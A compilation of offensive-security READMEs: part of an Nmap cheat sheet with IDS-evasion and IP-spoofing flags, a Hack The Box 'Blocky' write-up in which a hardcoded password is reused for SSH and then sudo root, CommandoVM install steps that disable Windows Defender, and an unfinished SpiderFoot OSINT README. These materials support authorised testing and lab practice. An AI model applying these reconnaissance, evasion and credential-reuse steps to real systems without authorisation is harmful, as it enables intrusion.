accurate)](#aggressive-fast-and-fairly-accurate) - [Very Aggressive (might miss open ports)](#very-aggressive-might-miss-open-ports) - [Output Types](#output-types) - [Normal text format](#normal-text-format) - [Grepable file (useful to search inside file)](#grepable-file-useful-to-search-inside-file) - [XML file](#xml-file) - [Output in all 3 formats supported](#output-in-all-3-formats-supported) - [Example](#example) - [Discover Live Hosts](#discover-live-hosts) - [Discover hosts by TCP SYN packets to specified ports (in our example here the ports are 22 to 25 and 80)](#discover-hosts-by-tcp-syn-packets-to-specified-ports-in-our-example-here-the-ports-are-22-to-25-and-80) - [Disable port discovery. Treat all hosts as online.](#disable-port-discovery-treat-all-hosts-as-online) - [Send ICMP Echo packets to discover hosts.](#send-icmp-echo-packets-to-discover-hosts) - [Ping scan.](#ping-scan) - [NSE Scripts](#nse-scripts) - [Run the specified script towards the targets.](#run-the-specified-script-towards-the-targets) - [Run the script with the specified arguments.](#run-the-script-with-the-specified-arguments) - [Update script database](#update-script-database) - [Other Useful Commands](#other-useful-commands) - [Scan IPv6 hosts](#scan-ipv6-hosts) - [Run the scan through proxies](#run-the-scan-through-proxies) - [Only show open ports](#only-show-open-ports) - [Get info and help for the specified script](#get-info-and-help-for-the-specified-script) - [Show currently installed version](#show-currently-installed-version) - [Spoof source IP](#spoof-source-ip) - [Maximum parallel probes/connections](#maximum-parallel-probesconnections) - [Maximum packets per second](#maximum-packets-per-second) - [#1 My personal favourite way of using Nmap](#1-my-personal-favourite-way-of-using-nmap) 1. [Step 1a: Host Discovery with well knows ports](#step-1a-host-discovery-with-well-knows-ports) 2. [Step 1b: Host Discovery with ICMP](#step-1b-host-discovery-with-icmp) 3. [Step 2: Filter Above Files to Create a Clean Live Hosts Lists](#step-2-filter-above-files-to-create-a-clean-live-hosts-lists) 4. [Step 3: Perform Full Port Scan using the Live Hosts List](#step-3-perform-full-port-scan-using-the-live-hosts-list) 5. [#2 Scan network for EternalBlue (MS17-010) Vulnerability](#2-scan-network-for-eternalblue-ms17-010-vulnerability) 6. [#3 Find HTTP servers and then run nikto against them](#3-find-http-servers-and-then-run-nikto-against-them) 7. [#4 Find Servers running Netbios (ports 137,139, 445)](#4-find-servers-running-netbios-ports-137-139-445) 8. [#5 Find Geo Location of a specific IP address](#5-find-geo-location-of-a-specific-ip-address) 9. [#6 Detect if a Website is protected by WAF](#6-detect-if-a-website-is-protected-by-waf) 10. [#7 Find well known vulnerabilities related to an open port](#7-find-well-known-vulnerabilities-related-to-an-open-port) # Installation * Pre-Installed on Kali Linux # Cheatsheet * [NMAP Commands Cheat Sheet and Tutorial with Examples as PDF](assets/NMAP%20CHEAT%20SHEET%20AND%20TUTORIAL.pdf) # Use > [Source of 'Use' Guide: @networkstraining](https://www.networkstraining.com/nmap-commands-cheat-sheet/) ## Scan IP address (Targets) > Because we have not specified any other switches on the commands above (except the target IP address), the command will perform first host discovery by default and then scan the most common 1000 TCP ports by default. ### Scan a single host IP `nmap 10.0.0.1` ### Scan a Class C subnet range `nmap 192.168.10.0/24` ### Scan the range of IPs between 10.1.1.5 up to 10.1.1.100 `nmap 10.1.1.5-100` ### Scan the IP addresses listed in text file “hosts.txt” `nmap -iL hosts.txt` ### Scan the 3 specified IPs only `nmap 10.1.1.3 10.1.1.6 10.1.1.8` ## Port Related Commands ### Scan only port 80 for specified host `nmap -p80 10.1.1.1` ### Scan via Ping if server block some requests ``` nmap -v -n -p- -Pn 10.18.53.20 ``` ### Scan ports 20 up to 23 for specified host `nmap -p20-23 10.1.1.1` ### Scan ports 80,88,8000 only `nmap -p80,88,8000 10.1.1.1` ### Scan ALL ports for specified host `nmap -p- 10.1.1.1` ### Scan ports UDP 53 and TCP 22 `nmap -sS -sU -p U:53,T:22 10.1.1.1` ### Scan http and ssh ports for specified host `nmap -p http,ssh 10.1.1.1` ## Different Scan Types ### TCP SYN Scan (best option) `nmap -sS 10.1.1.1 ` ### Full TCP connect scan `nmap -sT 10.1.1.1 ` ### Scan UDP ports `nmap -sU 10.1.1.1` ### Do a Ping scan only `nmap -sP 10.1.1.0/24` ### Don’t ping the hosts, assume they are up. `nmap -Pn 10.1.1.1` > There are some more scan types supported by nmap but we have listed the most useful ones above. Here is an overview of the most popular scan types: * -sS: This sends only a TCP SYN packet and waits for a TCP ACK. If it receives an ACK on the specific probed port, it means the port exist on the machine. This is fast and pretty accurate. * -sT: This creates a full TCP connection with the host (full TCP handshake). This is considered more accurate than SYN scan but slower and noisier. * -sP: This is for fast checking which hosts reply to ICMP ping packets (useful if you are on the same subnet as the scanned range and want a fast result about how many live hosts are connected). ## Identify Versions of Services and Operating Systems ### Version detection scan of open ports (services) `nmap -sV 10.1.1.1` ### Identify Operating System version `nmap -O 10.1.1.1` ### This combines OS detection, service version detection, script scanning and traceroute. `nmap -A 10.1.1.1 ` ## Scan Timings ### Slowest scan (to avoid IDS) `nmap -T0 10.1.1.1` ### Sneaky (to avoid IDS) `nmap -T1 10.1.1.1` ### Polite (10 times slower than T3) `nmap -T2 10.1.1.1` ### Default scan timer (normal) `nmap -T3 10.1.1.1` ### Aggressive (fast and fairly accurate) `nmap -T4 10.1.1.1` ### Very Aggressive (might miss open ports) `nmap -T5 10.1.1.1` ## Output Types ### Normal text format `nmap -oN [filename] [IP hosts]` ### Grepable file (useful to search inside file) `nmap -oG [filename] [IP hosts]` ### XML file `nmap -oX [filename] [IP hosts]` ### Output in all 3 formats supported `nmap -oA [filename] [IP hosts]` ### Example `nmap -oN scan.txt 192.168.0.0/24 (this will scan the subnet and output the results in text file “scan.txt”)` ## Discover Live Hosts ### Discover hosts by TCP SYN packets to specified ports (in our example here the ports are 22 to 25 and 80) `nmap -PS22-25,80 10.1.1.0/24` ### Disable port discovery. Treat all hosts as online. `nmap -Pn 10.1.1.0/24` ### Send ICMP Echo packets to discover hosts. `nmap -PE 10.1.1.0/24` ### Ping scan. `nmap -sn 10.1.1.0/24` ## NSE Scripts > Did you know that nmap is not only a port scanner? Actually, there are hundreds of included scripts that you can use with nmap to scan for all sorts of vulnerabilities, brute force login to services, check for well-known weaknesses on services etc. ### Run the specified script towards the targets. `nmap --script="name of script" 10.1.1.0/24` ### Run the script with the specified arguments. `nmap --script="name of script" --script-args="argument=arg" 10.1.1.0/24` ### Update script database `nmap --script-updatedb` ## Other Useful Commands ### Scan IPv6 hosts `nmap -6 [IP hosts]` ### Run the scan through proxies `nmap --proxies url1,url2` ### Only show open ports `nmap --open` ### Get info and help for the specified script `nmap --script-help="script name"` ### Show currently installed version `nmap -V` ### Spoof source IP `nmap -S [IP address] ` ### Maximum parallel probes/connections `nmap --max-parallelism [number]` ### Maximum packets per second `nmap --max-rate [number]` ## #1 My personal favourite way of using Nmap > Whenever I start a penetration test, I follow the steps below with nmap. ### Step 1a: Host Discovery with well knows ports `nmap -PS21-25,80,88,111,135,443,445,3306,3389,8000-8080 -T4 -oA hostdiscovery 100.100.100.0/24` The above will perform host discovery to identify live hosts using some well-known ports (21-25, 80, 443 etc). The output will be 3 files (gnmap, xml, txt) with filename “hostdiscovery”. We assume the target network range is 100.100.100.0/24 With the above technique, if at least one of the above TCP ports is open on a target host in the IP range then nmap will know that the host is alive. The above technique is efficient if you are scanning a large public IP range and you know there is a firewall in front and that only limited ports are visible because of the firewall. The above ports will most probably be visible on public hosts. ### Step 1b: Host Discovery with ICMP `nmap -PE -oA hostdiscovery 192.168.1.0/24` The above is a variation of previous step (Step 1a) whereby nmap sends ICMP packets to discover live hosts. This technique is effective if you are scanning from the same LAN subnet as the target range and there is no firewall in front of the hosts and also ICMP ping is not blocked from the hosts. The end result is the same as the previous step. Live hosts will be recorded in filename “hostdiscovery” with several ports marked as open for each IP address. ### Step 2: Filter Above Files to Create a Clean Live Hosts Lists The filename created above (“hostdiscovery”) will contain hosts with open ports. We can filter all IP addresses in the file above that have at least one open port and create a clean list of live host IPs. I use the linux `awk` command for this task as shown below: `awk ‘/open/{print $2}’ hostdiscovery.gnmap > livehosts.txt` From Step 1 before, there are three files created and one of them is a greppable format file with extension gnmap (“hostdiscovery.gnmap”). We run awk to search for open ports in that file and then redirect the output to another file “livehosts.txt”. This file will only contain a list of IP addresses that correspond to live hosts in the target network. ### Step 3: Perform Full Port Scan using the Live Hosts List Now after identifying the live hosts in the whole subnet, we can perform full port scan with nmap towards these hosts only. By doing this, we managed to be more efficient and perform scans faster than doing full port scan on the whole target range from the beginning. `nmap -p- -Pn -sS -A -T4 -iL livehosts.txt -oA fullscan` -p- : This scans all ports -Pn : Do not perform host discovery again -sS : Perform TCP SYN scan -A : This combines OS detection, service version detection, script scanning and traceroute -T4 : Pretty fast and accurate scanning -iL livehosts.txt : Scan the IPs contained in file “livehosts.txt” -oA : Export the results in file “fullscan” ### #2 Scan network for EternalBlue (MS17-010) Vulnerability In 2017 a huge zero-day vulnerability in Windows SMB was leaked to the public with the name “EternalBlue” (reference code MS17-010 from Microsoft). This is a critical risk vulnerability that allows easy compromise of remote Windows machines. You must scan your networks to find out if you have Windows machines that are not patched for this and the following nmap script is very useful for this task. `nmap -Pn -p445 --script=smb-vuln-ms17-010 192.168.1.0/24 -oN eternalblue-scan.txt` The command above will scan the whole Class C network 192.168.1.0/24 on port 445 (SMB port) for the EternalBlue vulnerability and will write the results in file “eternalblue-scan.txt” ### #3 Find HTTP servers and then run nikto against them The following scans the target range (100.100.100.0/24) for HTTP servers (ports 80 and 443) and then pipes the result to “Nikto” for further HTTP scans. Nikto is an open source tool for identifying well known HTTP vulnerabilities. nmap -p80,443 100.100.100.0/24 -oG – | nikto.pl -h – ### #4 Find Servers running Netbios (ports 137,139, 445) `nmap -sV -v -p 137,139,445 192.168.1.0/24` ### #5 Find Geo Location of a specific IP address The following command uses geolocation script “ip-geolocation-ipinfodb” to find the geographic location of a specific IP address. To use the above script you need to create a free account at https://ipinfodb.com/register.php and get an API key to use in the command as shown below (in script-args). `nmap --script=ip-geolocation-ipinfodb --script-args=ip-geolocation-ipinfodb.apikey=[APIKEY] 8.8.8.8` > Nmap scan report for google-public-dns-a.google.com (8.8.8.8) > Host is up (0.0097s latency). > Not shown: 998 filtered ports > PORT STATE SERVICE > 53/tcp open domain > 443/tcp open https > Host script results: > > | ip-geolocation-ipinfodb: > | 8.8.8.8 > | coordinates (lat,lon): 37.406,-122.079 > |_ city: Mountain View, California, United States ### #6 Detect if a Website is protected by WAF A WAF (Web Application Firewall) can be a software or hardware device in front of webservers to protect from HTTP web application attacks. The following command uses a script to detect if the target website is protected by a Web Application Firewall (WAF). The http-waf-detect script uses two arguments to try the tool’s built-in attack vectors for evaluating if the target web domain is protected by a WAF. `nmap -p80,443 --script http-waf-detect --script-args="http-waf-detect.aggro,http-waf-detect.detectBodyChanges" www.networkstraining.com` > Nmap scan report for www.networkstraining.com (104.18.38.202) > Host is up (0.011s latency). > PORT STATE SERVICE > 80/tcp open http > 443/tcp open https > | http-waf-detect: IDS/IPS/WAF detected: > |_www.networkstraining.com:443/?p4yl04d=hostname%00 ### #7 Find well known vulnerabilities related to an open port **Vuln Scan with nmap** ``` nmap -v --script vuln scanme.nmap.org ``` Let’s say you have scanned a target host and found several open services/ports running on the host. With nmap you can query public vulnerability databases to find out if there are any known published vulnerabilities related to the services running. **Step 1:** First you need to download the “nmap-vulners” script from Git and place it under the script directory of nmap: `cd /pentest/vulnerability-analysis/nmap/scripts` (or whatever the scripts directory is) or `git clone https://github.com/vulnersCom/nmap-vulners.git` **Step 2:** Since the script needs to know the exact version of the remote scanned service, you must use the -sV key when using the vulners script: `nmap -Pn -sV -p80 --script=vulners scanme.nmap.org` ``` PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) | vulners: | cpe:/a:apache:http_server:2.4.7: | CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679 | CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312 | CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 | CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788 | CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438 | CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231 | CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798 | CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743 | CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710 | CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736 | CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523 | CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161 | CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199 | CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098 | CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975 | CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117 | CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109 | CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185 | CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118 | CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283 |_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612 ``` As you can see from above, we have scanned port 80 (with -sV switch) and used the vulners script to get all known public vulnerabilities of the specific service (Apache httpd 2.4.7).
# Blocky-HTB Blocky is a Linux machine that is rated as easy, but it need a lot of enumerating. # Recon I started by runing nmap scan on the machine and found 3 open ports. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sC -sV 10.10.10.37 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 11:38 EDT Nmap scan report for 10.10.10.37 Host is up (0.040s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft &#8211; Under Construction! 8192/tcp closed sophos Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds ``` ## ffuf I will be using ffuf to fuze web directories. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ ./ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.37/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.1.0 ________________________________________________ :: Method : GET :: URL : http://10.10.10.37/FUZZ :: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 ________________________________________________ wiki [Status: 301, Size: 309, Words: 20, Lines: 10] wp-content [Status: 301, Size: 315, Words: 20, Lines: 10] plugins [Status: 301, Size: 312, Words: 20, Lines: 10] wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10] javascript [Status: 301, Size: 315, Words: 20, Lines: 10] wp-admin [Status: 301, Size: 313, Words: 20, Lines: 10] phpmyadmin [Status: 301, Size: 315, Words: 20, Lines: 10] [Status: 200, Size: 52253, Words: 3306, Lines: 314] server-status [Status: 403, Size: 299, Words: 22, Lines: 12] :: Progress: [220546/220546] :: Job [1/1] :: 934 req/sec :: Duration: [0:03:56] :: Errors: 0 :: ``` The only intrested one is ```/plugins```, if you visit it you will find 2 java jar files. So let's download it and check it out. ![image1](https://github.com/electronicbots/HackTheBox/blob/master/Machines/Blocky/images/1.png) ## wpscan So I runed wpscan and found that there is a user called notch ``` ┌──(kali㉿kali)-[~/Desktop/HTB/Blocky] └─$ wpscan --url http://10.10.10.37 -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.2 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.10.37/ [10.10.10.37] [+] Started: Mon Aug 24 12:29:32 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.10.37/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8 identified (Insecure, released on 2017-06-08). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator> | - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator> [+] WordPress theme in use: twentyseventeen | Location: http://10.10.10.37/wp-content/themes/twentyseventeen/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.4 | Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] notch | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Notch | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Mon Aug 24 12:29:35 2020 [+] Requests Done: 25 [+] Cached Requests: 35 [+] Data Sent: 5.952 KB [+] Data Received: 174.203 KB [+] Memory used: 173.871 MB [+] Elapsed time: 00:00:02 ``` ## User Flag So If you open ```BlockyCore.jar```, you will find a password here: ```/BlockyCore.jar/com/myfirstplugin/BlockyCore.java```. Note: look for online decompiler to open it. Here is the results: ``` // // Decompiled by Procyon v0.5.36 // package com.myfirstplugin; public class BlockyCore { public String sqlHost; public String sqlUser; public String sqlPass; public BlockyCore() { this.sqlHost = "localhost"; this.sqlUser = "root"; this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; } public void onServerStart() { } public void onServerStop() { } public void onPlayerJoin() { this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!"); } public void sendMessage(final String username, final String message) { } } ``` So now we can use this password ```8YsqfCTnvxAUeduzjNSXe22``` to ssh as user ```notch```. ``` ┌──(kali㉿kali)-[~/Desktop] └─$ ssh [email protected] The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established. ECDSA key fingerprint is SHA256:lg0igJ5ScjVO6jNwCH/OmEjdeO2+fx+MQhV/ne2i900. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230 notch@Blocky:~$ ``` And we can get User Flag: ``` notch@Blocky:~$ cat user.txt 59fee097...e751f3cd5 ``` ## Root Flag I runed ```sudo -l``` and found that we can run anything with sudo!!! ``` notch@Blocky:~$ sudo -l Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL ``` So we can do now ```sudo su``` and be root ;) ``` notch@Blocky:~$ sudo su root@Blocky:/home/notch# id uid=0(root) gid=0(root) groups=0(root) root@Blocky:/home/notch# ``` Note: if it ask for a password use the one we found earlier. Now we can get root flag: ``` root@Blocky:~# cat root.txt 0a9694a5...f7860f1cd5f ``` Thank you for reading, and you can find me here on twitter: https://twitter.com/electronicbots
![CommandoLogo](Images/commando-readme.png) ## What is CommandoVM? **Complete Mandiant Offensive VM ("CommandoVM")** is a comprehensive and customizable, Windows-based security distribution for penetration testing and red teaming. CommandoVM comes packaged with a variety of offensive tools not included in [Kali Linux](https://www.kali.org/) which highlight the effectiveness of Windows as an attack platform. ## Requirements * Windows 10 > Insider Preview editions of Windows are not supported * 60 GB Hard Drive * 2 GB RAM ## Recommended * Windows 10 22H2 * 80+ GB Hard Drive * 4+ GB RAM * 2 network adapters # Install Instructions ## Pre-Install Procedures **You MUST disable Windows Defender for a smooth install**. The best way to accomplish this is through Group Policy. In Windows versions 1909 and higher, Tamper Protection was added. **Tamper Protection must be disabled first, otherwise Group Policy settings are ignored.** 1. Open Windows Security (type `Windows Security` in the search box) 1. Virus & threat protection > Virus & threat protection settings > Manage settings 1. Switch `Tamper Protection` to `Off` > It is not necessary to change any other setting (`Real Time Protection`, etc.) > **Important!** Tamper Protection must be disabled before changing Group Policy settings. To permanently disable Real Time Protection: 1. Make sure you disabled Tamper Protection 1. Open Local Group Policy Editor (type `gpedit` in the search box) 1. Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Real-time Protection 1. Enable `Turn off real-time protection` 1. **Reboot** > Make sure to **reboot** before making the next change To permanently disable Microsoft Defender: 1. Make sure you rebooted your machine 1. Open Local Group Policy Editor (type `gpedit` in the search box) 1. Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus 1. Enable `Turn off Microsoft Defender Antivirus` 1. **Reboot** [1]: https://stackoverflow.com/questions/62174426/how-to-permanently-disable-windows-defender-real-time-protection-with-gpo ## Installation 1. Deploy a Windows Virtual Machine > [Where can I find a Windows Virtual Machine?](https://www.microsoft.com/en-us/software-download/windows10ISO) 1. Complete the pre-install procedures by disabling Defender 1. Download and extract the zip of the Commando-VM repo 1. Run PowerShell as Administrator 1. `Set-ExecutionPolicy Unrestricted -force` 1. `cd ~/Downloads/commando-vm` 1. `Get-ChildItem .\ -Recurse | Unblock-File` 1. `.\install.ps1` for a GUI install or `.\install.ps1 -cli` for command-line ## Credits - Jake Barteaux @day1player - Blaine Stancill @MalwareMechanic - Nhan Huynh @htnhan - Drew Farber @0xFarbs - Alex Tselevich @nos3curity - George Litvinov @geo-lit - Dennis Tran @Menn1s - Joseph Clay @skollr34p3r - Ana Martinez Gomez @anamma_06 - Moritz Raabe - Derrick Tran @dumosuku - Mandiant Red Team - Mandiant FLARE ## Legal Notice ``` This download configuration script is provided to assist penetration testers in creating handy and versatile toolboxes for offensive engagements. It provides a convenient interface for them to obtain a useful set of pentesting Tools directly from their original sources. Installation and use of this script is subject to the Apache 2.0 License. You as a user of this script must review, accept and comply with the license terms of each downloaded/installed package listed below. By proceeding with the installation, you are accepting the license terms of each package, and acknowledging that your use of each package will be subject to its respective license terms. ```
<a href="https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQv&s=os_gh"><img src="https://www.spiderfoot.net/wp-content/themes/spiderfoot/img/spiderfoot-wide.png"></a> [![License](https://img.shields.io/badge/license-GPLv2-blue.svg)](https://raw.githubusercontent.com/smicallef/spiderfoot/master/LICENSE) [![Python Version](https://img.shields.io/badge/python-3.7+-green)](https://www.python.org) [![Stable Release](https://img.shields.io/badge/version-3.4-blue.svg)](https://github.com/smicallef/spiderfoot/releases/tag/v3.4) [![CI status](https://github.com/smicallef/spiderfoot/workflows/Tests/badge.svg)](https://github.com/smicallef/spiderfoot/actions?query=workflow%3A"Tests") [![Last Commit](https://img.shields.io/github/last-commit/smicallef/spiderfoot)](https://github.com/smicallef/spiderfoot/commits/master) [![Libraries.io dependency status for latest release](https://img.shields.io/librariesio/release/github/smicallef/spiderfoot)](https://libraries.io/github/smicallef/spiderfoot) [![Codecov](https://codecov.io/github/smicallef/spiderfoot/coverage.svg)](https://codecov.io/github/smicallef/spiderfoot) [![Twitter Follow](https://img.shields.io/twitter/follow/spiderfoot?label=follow&style=social)](https://twitter.com/spiderfoot) [![Discord](https://img.shields.io/discord/770524432464216074)](https://discord.gg/vyvztrG) **SpiderFoot** is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate. SpiderFoot has an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line. It's written in **Python 3** and **GPL-licensed**. <img src="https://www.spiderfoot.net/wp-content/uploads/2020/08/SpiderFoot-3.1-browse.png"> ### FEATURES - Web based UI or CLI - Over 200 modules (see below) - Python 3 - CSV/JSON/GEXF export - API key export/import - SQLite back-end for custom querying - Highly configurable - Fully documented - Visualisations - TOR integration for dark web searching - Dockerfile for Docker-based deployments - Can call other tools like DNSTwist, Whatweb, Nmap and CMSeeK - Actively developed since 2012! ### WANT MORE? Need more from SpiderFoot? Check out [SpiderFoot HX](https://www.spiderfoot.net/hx) for: - 100% Cloud-based and managed for you - Attack Surface Monitoring with change notifications by email, REST and Slack - Multiple targets per scan - Multi-user collaboration - Authenticated and 2FA - Correlations - Investigations - Customer support - Third party tools pre-installed & configured - Drive it with a fully RESTful API - TOR integration built-in - Screenshotting - Feed scan data to Splunk, ElasticSearch and REST endpoints See the full set of differences between SpiderFoot HX and the open source version [here](https://www.spiderfoot.net/open-source-vs-hx/). ### USES SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet. You can target the following entities in a SpiderFoot scan: - IP address - Domain/sub-domain name - Hostname - Network subnet (CIDR) - ASN - E-mail address - Phone number - Username - Person's name - Bitcoin address SpiderFoot's 200+ modules feed each other in a publisher/subscriber model to ensure maximum data extraction to do things like: - [Host/sub-domain/TLD enumeration/extraction](https://asciinema.org/a/295912) - [Email address, phone number and human name extraction](https://asciinema.org/a/295947) - [Bitcoin and Ethereum address extraction](https://asciinema.org/a/295957) - [Check for susceptibility to sub-domain hijacking](https://asciinema.org/a/344377) - DNS zone transfers - [Threat intelligence and Blacklist queries](https://asciinema.org/a/295949) - API integration with [SHODAN](https://asciinema.org/a/127601), [HaveIBeenPwned](https://asciinema.org/a/128731), [GreyNoise](https://asciinema.org/a/295943), AlienVault, SecurityTrails, etc. - [Social media account enumeration](https://asciinema.org/a/295923) - [S3/Azure/Digitalocean bucket enumeration/scraping](https://asciinema.org/a/295941) - IP geo-location - Web scraping, web content analysis - [Image, document and binary file meta data analysis](https://asciinema.org/a/296274) - Dark web searches - [Port scanning and banner grabbing](https://asciinema.org/a/295939) - [Data breach searches](https://asciinema.org/a/296145) - So much more... ### INSTALLING & RUNNING To install and run SpiderFoot, you need at least Python 3.7 and a number of Python libraries which you can install with `pip`. We recommend you install a packaged release since master will often have bleeding edge features and modules that aren't fully tested. #### Stable build (packaged release): ``` $ wget https://github.com/smicallef/spiderfoot/archive/v3.4.tar.gz $ tar zxvf v3.4.tar.gz $ cd spiderfoot $ pip3 install -r requirements.txt $ python3 ./sf.py -l 127.0.0.1:5001 ``` #### Development build (cloning git master branch): ``` $ git clone https://github.com/smicallef/spiderfoot.git $ cd spiderfoot $ pip3 install -r requirements.txt $ python3 ./sf.py -l 127.0.0.1:5001 ``` Check out the [documentation](https://www.spiderfoot.net/documentation) and our [asciinema videos](https://asciinema.org/~spiderfoot) for more 